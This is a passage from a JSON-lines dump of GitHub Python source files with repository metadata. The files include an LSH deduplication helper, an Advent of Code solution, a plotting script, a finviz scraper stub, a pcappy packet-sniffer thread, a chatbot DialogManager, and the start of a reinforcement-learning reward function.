m\n\n def compute_min_hash_lsh_over_data(self, record_ids, data):\n \"\"\"\n Compute min hash of each document from given record Ids and data\n Args:\n record_ids (list[int]): list of given record Id\n data (list[list[str]]): list of content belonged to record Ids above\n\n Returns:\n lsh_vals (list[MinHash]): list of min hash value\n\n \"\"\"\n # make sure docId is unique over the corpus\n assert len(set(record_ids)) == len(record_ids)\n\n # for each record compute the hash\n lsh_vals = [\n self.compute_min_hash_lsh(terms=set(terms))\n for terms in data\n ]\n # TODO: convert to parallel\n for record_id, hash_val in zip(record_ids, lsh_vals):\n idx = \"{}\".format(record_id)\n # update the hash document to whole corpus\n self.lsh_server.insert(idx, hash_val)\n return lsh_vals\n\n def query_duplicated_record(self, query):\n \"\"\"\n Query to LSH corpus for getting duplicated record Id\n Args:\n query (MinHash):\n\n Returns:\n result (list[int]): record Id\n\n \"\"\"\n result = self.lsh_server.query(query)\n result = [idx for idx in result]\n return sorted(result)\n\n def clustering(self, df):\n \"\"\"\n Query every document in corpus to find duplicated content\n\n Args:\n lsh_vals (list[MinHash]): list of LSH hash\n Returns:\n duplicated_ids (list[int]): list of duplicated record Ids\n\n \"\"\"\n # duplicated_ids = []\n # for idx in range(len(lsh_vals)):\n # result = self.query_duplicated_document(lsh_vals[idx])\n # if len(result) > 1:\n # duplicated_ids.append(result)\n #\n # return duplicated_ids\n print(df.head())\n","repo_name":"tanthml/atc","sub_path":"trajclus/lib/lsh_lib.py","file_name":"lsh_lib.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"75"} +{"seq_id":"27401743448","text":"#read input\r\nwith open(\"input1.txt\") as f:\r\n\r\n players = f.read().split(\"\\n\\n\")\r\n p1 = [int(n) for n in players[0].split(\"\\n\")[1:]]\r\n p2 = [int(n) for n in players[1].split(\"\\n\")[1:]]\r\n\r\n\r\n#play ball\r\ncurr_round = 0\r\nwhile len(p1) > 0 and len(p2) > 0:\r\n curr_round += 1\r\n\r\n print(\"\\n-- Round \" + str(curr_round) + \" --\")\r\n print(\"Player 1's deck: \" + str(p1))\r\n print(\"Player 2's deck: \" + str(p2))\r\n \r\n\r\n c1, c2 = p1.pop(0), p2.pop(0)\r\n\r\n print(\"Player 1 plays: \" + str(c1))\r\n print(\"Player 2 plays: \" + str(c2))\r\n if c1 > c2:\r\n winner = p1\r\n print(\"Player 1 wins the round!\")\r\n else: #we don't account for draws yet\r\n winner = p2\r\n print(\"Player 2 wins the round!\")\r\n\r\n winner.append(max(c1, c2))\r\n winner.append(min(c1, c2))\r\n\r\n\r\n#print final score\r\nscore = 0\r\nfor i, c in enumerate(winner):\r\n score += (len(winner) - i) * c\r\n\r\nprint(\"\\n\\nFinal Score: \" + str(score))\r\n \r\n","repo_name":"dreary-dugong/puzzles","sub_path":"Advent of Code/2020/day 22/puzzle1.py","file_name":"puzzle1.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20142313010","text":"import os, sys\nimport pickle\nimport numpy as np\nimport argparse\nimport time\nimport glob\n\nimport matplotlib\nimport matplotlib.ticker as ticker\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport matplotlib.dates as md\n\n\nif __name__ == '__main__':\n\n ## init a parser\n parser = argparse.ArgumentParser(description='data plot')\n parser.add_argument('--output_dir', type=str, default='output')\n parser.add_argument('--alg_output_dir', type=str, default='output')\n parser.add_argument('--exp_name', type=str, default='acon2')\n parser.add_argument('--fig_root', type=str, default='output/figs')\n # parser.add_argument('--style', type=str, nargs='+', default=['-k', '-r', '-b'])\n parser.add_argument('--fontsize', type=int, default=15)\n # parser.add_argument('--data_start_idx', type=int, default=0)\n # parser.add_argument('--data_end_idx', type=int, default=2000)\n parser.add_argument('--y_min', type=float, default=0.0)\n parser.add_argument('--y_max', type=float, default=0.03)\n parser.add_argument('--tag', type=str, default='')\n parser.add_argument('--n_sources', type=int, default=3)\n #parser.add_argument('--alpha_list', type=str, nargs='+', default=['0d03', '0d15', '0d3'])\n parser.add_argument('--K', type=int, default=3)\n parser.add_argument('--alpha_list', type=str, nargs='+', default=['0.01', '0.001'])\n parser.add_argument('--alpha_color', type=str, nargs='+', default=['green', 'red', 'blue'])\n parser.add_argument('--duration', type=int, default=3600)\n parser.add_argument('--start_idx', type=int, default=0) # skip the first junk part \n\n args = parser.parse_args()\n \n # init\n #fn_out = os.path.join(args.fig_root, args.exp_name, f'plot_error_var_K_{args.K}_alpha{\"_\" if args.tag else \"\"}{args.tag}')\n fn_out = os.path.join(args.fig_root, args.exp_name, f'plot-error-var-K-{args.K}-alphas')\n os.makedirs(os.path.dirname(fn_out), exist_ok=True)\n\n # read data\n error_min_list = []\n error_max_list = []\n error_mean_list = []\n alpha_list = []\n alpha_color_list = []\n t_list = []\n for alpha_color, alpha_str in zip(args.alpha_color, args.alpha_list):\n data_path_list = glob.glob(os.path.join(args.alg_output_dir, f'{args.exp_name}_K_{args.K}_alpha_{alpha_str.replace(\".\", \"d\")}_iter_*_duration_{args.duration}', 'data.pk'))\n print(data_path_list)\n error_stack = []\n for p in data_path_list:\n data = pickle.load(open(p, 'rb'))\n error = [d['miscoverage_cons'] for d in data]\n error_stack.append(error)\n print(p, len(error))\n if len(error_stack) == 0:\n continue\n len_min = min([len(error) for error in error_stack])\n error_stack = [error[:len_min] for error in error_stack]\n error_stack = np.array(error_stack)\n error_min = np.amin(error_stack, 0)\n error_max = np.amax(error_stack, 0)\n error_mean = np.mean(error_stack, 0)\n t = np.arange(len(error_min))\n t_list.append(t)\n error_min_list.append(error_min)\n error_max_list.append(error_max)\n error_mean_list.append(error_mean)\n alpha_list.append(alpha_str)\n alpha_color_list.append(alpha_color)\n\n \n \n with PdfPages(fn_out + '.pdf') as pdf:\n hs = []\n plt.figure(1)\n\n # pseudo-miscoverage rate range\n for error_min, error_max, error_mean, t, alpha_str, color in zip(error_min_list, error_max_list, error_mean_list, t_list, alpha_list, alpha_color_list):\n\n error_min = error_min[args.start_idx:]\n error_max = error_max[args.start_idx:]\n error_mean = error_mean[args.start_idx:]\n t = t[args.start_idx:]\n\n alpha_acon2 = float(alpha_str)\n\n # mean\n h = plt.plot(t, error_mean, color=color, linewidth=2)\n \n # min/max\n h = plt.fill_between(t, error_max, error_min, color=color, alpha=0.2, label=rf'ACC with $\\alpha={alpha_acon2}$')\n hs.append(h)\n\n # alpha\n h = plt.hlines(alpha_acon2, min(t), max(t), colors='k', linestyles='solid', label=rf'$\\alpha={alpha_acon2}$')\n\n \n # beautify\n plt.ylim((args.y_min, args.y_max))\n plt.xlabel('# observations', fontsize=args.fontsize)\n plt.ylabel(f'pseudo-miscoverage rate', fontsize=args.fontsize)\n plt.grid('on')\n plt.yticks(list(set(list(plt.yticks()[0]) + [float(e) for e in args.alpha_list])))\n plt.legend(handles=hs, fontsize=args.fontsize)\n plt.savefig(fn_out+'.png', bbox_inches='tight')\n pdf.savefig(bbox_inches='tight')\n\n print(fn_out)\n","repo_name":"sslab-gatech/ACon2","sub_path":"solidity/plots/plot_error_var_alpha.py","file_name":"plot_error_var_alpha.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"69891541045","text":"#import\ntry: \n import urllib3\n from bs4 import BeautifulSoup\nexcept ImportError:\n print (\"Error importing\")\n\n\nhttp = urllib3.PoolManager()\n\ndef get_url(url, header):\n response = http.request('GET', url, headers=header)\n\n if response.status == 503:\n print (response.status)\n if response.status == 200:\n # return response object\n return (response)\n\ndef struct_response(response):\n response_body = BeautifulSoup(get_url_response.data, features=\"html.parser\")\n return (response_body)\n\ndef get_tickers(html):\n array = [1,2,3]\n return (array)\n\nsite_url = 'https://finviz.com/'\nheader = {'User-Agent': 'Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0 '}\n\nget_url_response = get_url(site_url, header)\nhtml_struct = struct_response(get_url_response)\nticker_array = get_tickers(html_struct)\n\n# response_status = get_url_response.status\n# response_headers = get_url_response.headers\n\n# print (html_struct)\nprint (ticker_array)\n","repo_name":"jaypestillo/soldi_puliti","sub_path":"finviz_functions.py","file_name":"finviz_functions.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"1791141157","text":"import threading\n\nimport pcappy\nimport parser.packet as packet_parser\n\nMAX_PACKET_SIZE=65535\nTIMEOUT=1000\n\nclass Sniffer(threading.Thread):\n def __init__(self, interface, snaplen, promisc, ms):\n threading.Thread.__init__(self)\n self.interface = interface\n self.snaplen = snaplen\n self.promisc = promisc\n self.ms = ms\n self.d = {}\n self.capture = None\n\n def run(self):\n self.capture = pcappy.open_live(self.interface, snaplen=self.snaplen,\n promisc=self.promisc, to_ms=self.ms)\n self.capture.loop(-1, self._parse_packet, self.d)\n\n def stop(self):\n self.capture.breakloop()\n\n def _parse_packet(self, d, hdr, data):\n ts = float(str(hdr.ts[1]) + \".\" + str(hdr.ts[0]))\n packet = packet_parser.Packet(ts, data)\n if packet:\n print(packet.to_json())\n","repo_name":"kbrebanov/sniffy","sub_path":"sniffer/sniffer.py","file_name":"sniffer.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"70824282807","text":"import asyncio\r\nimport enum\r\nimport itertools\r\nimport logging\r\nimport random\r\nfrom uuid import uuid4\r\nfrom datetime import datetime, timedelta\r\nfrom numbers import Number\r\nfrom typing import Dict, Union, List, Optional\r\n\r\nfrom apscheduler.job import Job\r\nfrom apscheduler.jobstores.base import JobLookupError\r\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\r\nfrom apscheduler.schedulers.base import BaseScheduler\r\nfrom mongoengine import ValidationError, FieldDoesNotExist, QuerySet\r\n\r\nfrom convai import run_sync_in_executor\r\nfrom convai.conversation_gateways import AbstractGateway, AbstractDialogHandler, HumansGateway, BotsGateway\r\nfrom convai.exceptions import UserBannedError, SimultaneousDialogsError\r\nfrom model import User, Bot, BannedPair, Conversation, ConversationPeer, PersonProfile, Complaint, Settings\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\n\r\nclass DialogManager(AbstractDialogHandler):\r\n class EvaluationState(enum.Flag):\r\n NONE = 0\r\n SCORE_GIVEN = enum.auto()\r\n PROFILE_SELECTED = enum.auto()\r\n COMPLETE = SCORE_GIVEN | PROFILE_SELECTED\r\n\r\n _evaluations: Dict[int, List[EvaluationState]]\r\n _dialog_timeout_handlers: Dict[int, Job]\r\n _active_dialogs: Dict[int, Conversation]\r\n _lobby: Dict[User, Job]\r\n\r\n humans_gateway: HumansGateway\r\n bots_gateway: BotsGateway\r\n\r\n dialog_options: dict\r\n evaluation_options: dict\r\n\r\n dialog_eval_min: int\r\n dialog_eval_max: int\r\n length_threshold: int\r\n inactivity_timeout: Number\r\n human_bot_ratio: float\r\n max_time_in_lobby: Number\r\n\r\n def __init__(self, bots_gateway: BotsGateway, humans_gateway: HumansGateway, dialog_options: dict,\r\n evaluation_options: dict, scheduler: BaseScheduler = None):\r\n \"\"\"\r\n Dialog manager is responsible for handling conversations. Including matching with human and bot peers, dialog \r\n setup, dialog evaluation, etc.\r\n\r\n :param bots_gateway: An object capable of handling system-to-bot communication\r\n :param humans_gateway: An object capable of handling system-to-human communication\r\n :param dialog_options: dialog options\r\n :param evaluation_options: dialog evaluation options\r\n :param scheduler: custom non-blocking scheduler object which conforms to the interface of\r\n apscheduler.schedulers.base.BaseScheduler. Default value is BackgroundScheduler().\r\n \"\"\"\r\n self.humans_gateway = humans_gateway\r\n self.bots_gateway = bots_gateway\r\n self.scheduler = scheduler if scheduler is not None else AsyncIOScheduler()\r\n\r\n self.dialog_options = dialog_options\r\n self.evaluation_options = evaluation_options\r\n\r\n self.dialog_eval_min = evaluation_options['evaluation_score_from']\r\n self.dialog_eval_max = evaluation_options['evaluation_score_to']\r\n self.length_threshold = dialog_options['max_length']\r\n self.inactivity_timeout = dialog_options['inactivity_timeout']\r\n self.human_bot_ratio = dialog_options['human_bot_ratio']\r\n self.max_time_in_lobby = dialog_options['max_time_in_lobby']\r\n\r\n self._lobby = {}\r\n self._active_dialogs = {}\r\n self._evaluations = {}\r\n self._dialog_timeout_handlers = {}\r\n\r\n self.scheduler.start()\r\n\r\n async def on_human_initiated_dialog(self, user: User):\r\n log.info(f'human initiated dialog: {user.user_key}')\r\n if user.banned:\r\n raise UserBannedError(\"Banned users are not allowed to start dialogs\")\r\n active_dialogs_peers = itertools.chain(*map(lambda c: (c.participant1, c.participant2),\r\n self._active_dialogs.values()))\r\n if user in self._lobby or user in map(lambda p: p.peer, active_dialogs_peers):\r\n raise SimultaneousDialogsError(\"Starting multiple dialogs simultaneously is prohibited\")\r\n\r\n if random.random() > self.human_bot_ratio:\r\n log.info(f'bot peer selected')\r\n await self._start_dialog_with_bot(user)\r\n return\r\n if await self._try_start_dialog_with_human(user):\r\n return # Human peer has been found in the lobby and the dialog started right away\r\n log.info(f'no humans found in lobby. Setting up the timer')\r\n\r\n # No waiting human peers are available. Putting user in lobby for \"max_time_in_lobby\" seconds and starting\r\n # the dialog with bot in the case of timeout\r\n event = self._schedule(self.max_time_in_lobby, self._start_dialog_with_bot, argument=(user,))\r\n self._lobby[user] = event\r\n\r\n async def on_message_received(self, conversation_id: int, sender: Union[Bot, User], text: str,\r\n time: datetime) -> int:\r\n log.info(f'message received for conversation {conversation_id}')\r\n self._validate_conversation_and_peer(conversation_id, sender)\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n if conversation_id in self._evaluations:\r\n raise ValueError('Conversation is finished. Only evaluation is allowed')\r\n\r\n msg = conversation.add_message(text=text, sender=sender, time=time)\r\n\r\n receiver = next((p.peer for p in conversation.participants if p.peer != sender), None)\r\n if receiver is None:\r\n raise RuntimeError('Could not find a receiver for the message')\r\n\r\n await self._gateway_for_peer(receiver).send_message(conversation_id, msg.msg_id, msg.text, receiver)\r\n\r\n if len(conversation.messages) >= self.length_threshold:\r\n log.info(f'conversation length threshold reached. Finishing the conversation')\r\n await self.trigger_dialog_end(conversation_id, sender)\r\n else:\r\n self._reset_inactivity_timer(conversation_id)\r\n\r\n return msg.msg_id\r\n\r\n async def on_message_evaluated(self, conversation_id: int, evaluator: Union[Bot, User], score: int,\r\n msg_id: int = None):\r\n log.info(f'message evaluated in conversation {conversation_id}')\r\n self._validate_conversation_and_peer(conversation_id, evaluator)\r\n conversation = self._active_dialogs[conversation_id]\r\n if score > 1 or score < 0:\r\n raise ValueError('Score should be within a range [0, 1]')\r\n\r\n if msg_id is None:\r\n msg_id = next((m.msg_id for m in conversation.messages[::-1] if m.sender != evaluator), -1)\r\n msg = next((m for m in conversation.messages if m.msg_id == msg_id), None)\r\n\r\n if msg is None:\r\n raise ValueError('Could not find a message with id {}'.format(msg_id))\r\n\r\n if msg.sender == evaluator:\r\n raise ValueError('Could not find evaluate own messages')\r\n\r\n msg.evaluation_score = score\r\n\r\n async def switch_to_next_topic(self, conversation_id: int, peer: User) -> int:\r\n log.info('switching to the next conversation topic')\r\n self._validate_conversation_and_peer(conversation_id, peer)\r\n conversation: Conversation = self._active_dialogs[conversation_id]\r\n\r\n messages_to_switch_topic_left = conversation.next_topic()\r\n\r\n if messages_to_switch_topic_left == 0:\r\n index = conversation.active_topic_index\r\n msg = conversation.add_message(text=f'Switched to topic with index {index}', sender=peer, system=True)\r\n\r\n for conv_peer in conversation.participants:\r\n kwargs = {}\r\n if self.dialog_options['use_images'] and isinstance(conv_peer.peer, User):\r\n kwargs['image'] = conv_peer.assigned_profile.get_topic_image(index)\r\n if isinstance(conv_peer.peer, Bot):\r\n kwargs['conv_id'] = conversation_id\r\n kwargs['msg_id'] = msg.msg_id\r\n await self._gateway_for_peer(conv_peer.peer).on_topic_switched(conv_peer.peer,\r\n conv_peer.assigned_profile.topics[index],\r\n **kwargs)\r\n\r\n return messages_to_switch_topic_left\r\n\r\n async def trigger_dialog_end(self, conversation_id: int, peer: Union[Bot, User]):\r\n log.info(f'end of conversation {conversation_id} triggered')\r\n self._validate_conversation_and_peer(conversation_id, peer)\r\n\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n for participant in conversation.participants:\r\n if participant.peer == peer:\r\n participant.triggered_dialog_end = True\r\n\r\n await self._initiate_final_evaluation(conversation_id)\r\n\r\n async def evaluate_dialog(self, conversation_id: int, evaluator: Union[User, Bot], score: Optional[int]):\r\n log.info(f'conversation {conversation_id} evaluated')\r\n self._validate_conversation_and_peer(conversation_id, evaluator)\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n if conversation_id not in self._evaluations:\r\n raise ValueError('Conversation is not finished yet')\r\n\r\n peer_idx = 0 if conversation.participant1.peer == evaluator else 1\r\n\r\n if score is not None:\r\n if score > self.dialog_eval_max or score < self.dialog_eval_min:\r\n raise ValueError('Score should be within a range [{}, {}]'.format(self.dialog_eval_min,\r\n self.dialog_eval_max))\r\n\r\n conversation_peer = next((p for p in conversation.participants if p.peer == evaluator))\r\n\r\n conversation_peer.dialog_evaluation_score = score\r\n\r\n self._evaluations[conversation_id][peer_idx] |= self.EvaluationState.SCORE_GIVEN\r\n\r\n if not self.dialog_options['assign_profile'] or not self.evaluation_options['guess_profile']:\r\n self._evaluations[conversation_id][peer_idx] |= self.EvaluationState.PROFILE_SELECTED\r\n\r\n await self._handle_evaluation_state(conversation_id)\r\n\r\n async def select_other_peer_profile(self, conversation_id: int, evaluator: Union[User, Bot],\r\n profile_idx: Optional[int]):\r\n log.info(f'partner profile selected in conversation {conversation_id}')\r\n self._validate_conversation_and_peer(conversation_id, evaluator)\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n if conversation_id not in self._evaluations:\r\n raise ValueError('Conversation is not finished yet')\r\n\r\n peer_idx = 0 if conversation.participants[0].peer == evaluator else 1\r\n\r\n evaluator_peer = next((p for p in conversation.participants if p.peer == evaluator))\r\n\r\n if profile_idx is not None:\r\n if profile_idx < 0 or profile_idx >= len(evaluator_peer.other_peer_profile_options):\r\n raise ValueError('Selected profile was not an option')\r\n\r\n evaluator_peer.other_peer_profile_selected = evaluator_peer.other_peer_profile_options[profile_idx]\r\n\r\n self._evaluations[conversation_id][peer_idx] |= self.EvaluationState.PROFILE_SELECTED\r\n await self._handle_evaluation_state(conversation_id)\r\n\r\n async def select_other_peer_profile_sentence(self, conversation_id: int, evaluator: Union[User, Bot],\r\n sentence: str, sentence_idx: Optional[int] = None):\r\n log.info(f'partner profile sentence selected in conversation {conversation_id}')\r\n self._validate_conversation_and_peer(conversation_id, evaluator)\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n if conversation_id not in self._evaluations:\r\n raise ValueError('Conversation is not finished yet')\r\n\r\n peer_idx = 0 if conversation.participants[0].peer == evaluator else 1\r\n\r\n evaluator_peer = next((p for p in conversation.participants if p.peer == evaluator))\r\n other_peer = next((p for p in conversation.participants if p.peer != evaluator))\r\n\r\n if sentence_idx is None:\r\n sentence_idx = len(evaluator_peer.other_peer_profile_selected_parts)\r\n\r\n nones_to_append = sentence_idx - len(evaluator_peer.other_peer_profile_selected_parts) + 1\r\n\r\n evaluator_peer.other_peer_profile_selected_parts += [None] * nones_to_append\r\n evaluator_peer.other_peer_profile_selected_parts[sentence_idx] = sentence\r\n\r\n selected_parts = [x for x in evaluator_peer.other_peer_profile_selected_parts if x is not None]\r\n\r\n if len(selected_parts) == len(other_peer.assigned_profile.persona):\r\n self._evaluations[conversation_id][peer_idx] |= self.EvaluationState.PROFILE_SELECTED\r\n await self._handle_evaluation_state(conversation_id)\r\n\r\n async def complain(self, conversation_id: int, complainer: User) -> bool:\r\n log.info(f'complaint about conversation {conversation_id}')\r\n self._validate_conversation_and_peer(conversation_id, complainer)\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n if len(conversation.messages) == 0:\r\n return False\r\n\r\n complain_to = [x.peer for x in conversation.participants if x.peer != complainer][0]\r\n\r\n complaint = Complaint(complainer=complainer,\r\n complain_to=complain_to,\r\n conversation=conversation)\r\n\r\n def save_complaint_and_dialog():\r\n conversation.save()\r\n complaint.save()\r\n\r\n await run_sync_in_executor(save_complaint_and_dialog)\r\n return True\r\n\r\n async def _handle_evaluation_state(self, conversation_id: int):\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n def check(i):\r\n return isinstance(conversation.participants[i].peer, Bot) or \\\r\n self._evaluations[conversation_id][i] == self.EvaluationState.COMPLETE\r\n\r\n completed = all(map(check, range(2)))\r\n\r\n if completed:\r\n await self._cleanup_conversation(conversation_id)\r\n\r\n async def dialog_is_active(self, conversation_id: int) -> bool:\r\n return conversation_id in self._active_dialogs\r\n\r\n def _validate_conversation_and_peer(self, conversation_id: int, peer: Union[Bot, User]):\r\n log.debug(f'validating conversation and peer: {conversation_id}, {peer}')\r\n if conversation_id not in self._active_dialogs:\r\n raise ValueError('There is no active conversation with id {}'.format(conversation_id))\r\n conversation = self._active_dialogs[conversation_id]\r\n\r\n if not any(map(lambda p: p.peer == peer, conversation.participants)):\r\n raise ValueError('Peer is not a part of the conversation')\r\n\r\n def _schedule(self, delay, action, argument=(), kwargs=None):\r\n if kwargs is None:\r\n kwargs = {}\r\n job = self.scheduler.add_job(action,\r\n 'date',\r\n args=argument,\r\n kwargs=kwargs,\r\n run_date=datetime.now() + timedelta(seconds=delay))\r\n return job\r\n\r\n @staticmethod\r\n def _unschedule_safe(job):\r\n try:\r\n job.remove()\r\n except JobLookupError:\r\n pass\r\n\r\n def _unschedule_lobby_timeout(self, user: User):\r\n if user in self._lobby:\r\n self._unschedule_safe(self._lobby[user])\r\n del self._lobby[user]\r\n\r\n def _unschedule_inactivity_timer(self, conversation_id):\r\n if conversation_id in self._dialog_timeout_handlers:\r\n self._unschedule_safe(self._dialog_timeout_handlers[conversation_id])\r\n del self._dialog_timeout_handlers[conversation_id]\r\n\r\n def _reset_inactivity_timer(self, conversation_id: int):\r\n log.debug(f'inactivity timer reset for conversation {conversation_id}')\r\n self._unschedule_inactivity_timer(conversation_id)\r\n\r\n event = self._schedule(self.inactivity_timeout, self._handle_conversation_timeout, argument=(conversation_id,))\r\n self._dialog_timeout_handlers[conversation_id] = event\r\n\r\n async def _try_start_dialog_with_human(self, user: User):\r\n log.info(f'trying to start human-human dialog')\r\n if len(self._lobby) == 0:\r\n log.info(f'failed to start human-human dialog. The lobby is empty')\r\n return False\r\n\r\n log.info(f'human partner found in the lobby')\r\n\r\n peer = random.choice(list(self._lobby.keys()))\r\n self._unschedule_lobby_timeout(peer)\r\n await self._instantiate_dialog(user, peer)\r\n return True\r\n\r\n async def _start_dialog_with_bot(self, user: User):\r\n log.info(f'starting dialog with bot')\r\n self._unschedule_lobby_timeout(user)\r\n if user.assigned_test_bot:\r\n bots = await run_sync_in_executor(Bot.objects, banned=False, token=user.assigned_test_bot.token)\r\n else:\r\n bots = await run_sync_in_executor(Bot.objects, banned=False)\r\n bots_count = await run_sync_in_executor(bots.count)\r\n if self.bots_gateway is None or bots_count == 0:\r\n log.warning(f'no bots found or bots gateway is None')\r\n await self.humans_gateway.on_conversation_failed(user,\r\n AbstractGateway.ConversationFailReason.PEER_NOT_FOUND)\r\n return\r\n found = False\r\n bot = None # Silence PyCharm warning\r\n while not found:\r\n bot = await run_sync_in_executor(lambda: bots[random.randrange(bots_count)])\r\n found = (await run_sync_in_executor(lambda: BannedPair.objects(user=user, bot=bot).count())) == 0\r\n await self._instantiate_dialog(user, bot)\r\n\r\n def _gateway_for_peer(self, peer: Union[User, Bot, ConversationPeer]):\r\n if isinstance(peer, ConversationPeer):\r\n return self._gateway_for_peer(peer.peer)\r\n\r\n if not isinstance(peer, User) and not isinstance(peer, Bot):\r\n raise RuntimeError('Unexpected peer class: {}. Only {} are supported'.format(type(peer), [User, Bot]))\r\n return self.humans_gateway if isinstance(peer, User) else self.bots_gateway\r\n\r\n async def _instantiate_dialog(self, user: User, peer: Union[User, Bot]):\r\n log.info(f'instantiating the dialog')\r\n\r\n conversation = Conversation(participant1=ConversationPeer(peer=user, peer_conversation_guid=uuid4().__str__()),\r\n participant2=ConversationPeer(peer=peer, peer_conversation_guid=uuid4().__str__()))\r\n\r\n tags_set: QuerySet = Settings.objects(name='tags')\r\n active_tags = tags_set.first().value if tags_set.count() else []\r\n\r\n if active_tags:\r\n profiles: QuerySet = await run_sync_in_executor(PersonProfile.objects(tags__in=active_tags))\r\n if profiles.count() == 0:\r\n log.warning(f'Not found any profiles with tags: {active_tags}')\r\n profiles: QuerySet = await run_sync_in_executor(PersonProfile.objects)\r\n else:\r\n profiles: QuerySet = await run_sync_in_executor(PersonProfile.objects)\r\n\r\n first_profile = None\r\n linked_profile_uuid = None\r\n\r\n for p in conversation.participants:\r\n if first_profile is None:\r\n p.assigned_profile = first_profile = random.choice(profiles)\r\n linked_profile_uuid = first_profile.link_uuid\r\n\r\n else:\r\n # profiles assignment order:\r\n # other profile from the same linked group || profile with unmatching sentences || same profile\r\n second_profile = random.choice(profiles(id__ne=first_profile.id, link_uuid=linked_profile_uuid) or\r\n (profiles(persona__ne=first_profile.persona) or [first_profile]))\r\n\r\n p.assigned_profile = second_profile\r\n\r\n while True:\r\n conv_id = random.getrandbits(31)\r\n if conv_id not in self._active_dialogs and \\\r\n await run_sync_in_executor(lambda: Conversation.objects(conversation_id=conv_id).count()) == 0:\r\n break\r\n conversation.conversation_id = conv_id\r\n\r\n conversation.messages_to_switch_topic = self.dialog_options['n_messages_to_switch_topic']\r\n conversation.reset_topic_switch_counter()\r\n\r\n self._active_dialogs[conv_id] = conversation\r\n\r\n for p in conversation.participants:\r\n target_gateway = self._gateway_for_peer(p)\r\n await target_gateway.start_conversation(conv_id, p.peer, p.assigned_profile, p.peer_conversation_guid)\r\n\r\n self._reset_inactivity_timer(conv_id)\r\n\r\n async def _handle_conversation_timeout(self, conversation_id: int):\r\n log.info(f'dialog inactivity timeout: {conversation_id}')\r\n if conversation_id in self._evaluations:\r\n await self._cleanup_conversation(conversation_id)\r\n else:\r\n await self._initiate_final_evaluation(conversation_id)\r\n\r\n async def _cleanup_conversation(self, conversation_id: int):\r\n log.info(f'cleaning up the conversation {conversation_id}')\r\n conversation = self._active_dialogs[conversation_id]\r\n all_gateways = set(map(self._gateway_for_peer, conversation.participants))\r\n\r\n await asyncio.gather(*[gw.finish_conversation(conversation_id) for gw in all_gateways], return_exceptions=True)\r\n try:\r\n await run_sync_in_executor(conversation.save)\r\n except ValidationError:\r\n log.warning('Empty conversation. Not saving')\r\n\r\n self._unschedule_inactivity_timer(conversation_id)\r\n del self._active_dialogs[conversation_id]\r\n del self._evaluations[conversation_id]\r\n\r\n async def _initiate_final_evaluation(self, conversation_id: int):\r\n log.info(f'initiating final evaluation for conversation {conversation_id}')\r\n conversation = self._active_dialogs[conversation_id]\r\n self._reset_inactivity_timer(conversation_id)\r\n\r\n self._evaluations[conversation_id] = [self.EvaluationState.NONE] * 2\r\n\r\n db_profiles = await run_sync_in_executor(PersonProfile.objects)\r\n\r\n to_await = []\r\n for i, p in enumerate(conversation.participants):\r\n true_profile: PersonProfile = conversation.participants[1 - i].assigned_profile\r\n random_profile: PersonProfile = random.choice(db_profiles(persona__ne=true_profile.persona) or\r\n [true_profile])\r\n\r\n profiles = [true_profile, random_profile]\r\n random.shuffle(profiles)\r\n\r\n p.other_peer_profile_options = profiles\r\n\r\n to_await.append(\r\n self._gateway_for_peer(p.peer).start_evaluation(conversation_id,\r\n p.peer,\r\n profiles,\r\n true_profile,\r\n range(self.dialog_eval_min, self.dialog_eval_max + 1)))\r\n\r\n await asyncio.gather(*to_await)\r\n","repo_name":"deeppavlov/convai_router_bot","sub_path":"convai/dialog_manager.py","file_name":"dialog_manager.py","file_ext":"py","file_size_in_byte":23245,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"23848194269","text":"'''\n@author : CodePerfectPlus\n@Topic : Generator\n'''\n\n\nright_combination = (2,3,5)\n\nfor c1 in range(10):\n for c2 in range(10):\n for c3 in range(10):\n if (c1,c2,c3) == right_combination:\n print('Found The Combination :{}'.format((c1,c2,c3)))\n","repo_name":"codeperfectplus/Pythonite","sub_path":"Python basic/generator_function.py","file_name":"generator_function.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"28050267480","text":"\ndef compute_reward(observations, done):\n # The sign depend on its function.\n total_reward = 0\n \n # # create and update from last position\n # last_position = []\n # last_position.append(self.last_pose.position.x)\n # last_position.append(self.last_pose.position.y)\n # last_position.append(self.last_pose.position.z)\n\n # # create and update current position\n # current_position = []\n # current_position.append(self.current_pose.position.x)\n # current_position.append(self.current_pose.position.y)\n # current_position.append(self.current_pose.position.z)\n\n # # create the distance btw the two last vector\n # distance_before_move = self.distance_between_vectors(last_position, self.target_position)\n # distance_after_move = self.distance_between_vectors(current_position, self.target_position)\n\n last_object_position = [self.last_observation[10], self.last_observation[11], self.last_observation[12]]\n current_object_position = [self.current_observation[10], self.current_observation[11], self.current_observation[12]]\n\n # create the distance btw the two last vector\n distance_before_move = self.distance_between_vectors(last_object_position, self.target_position)\n distance_after_move = self.distance_between_vectors(current_object_position, self.target_position)\n \n # Give the reward\n if self.out_workspace:\n total_reward -= 20\n else:\n if done:\n total_reward += 1500\n else:\n print(\"Distance object to target: \", distance_after_move - distance_before_move)\n if(distance_after_move - distance_before_move < 0): # before 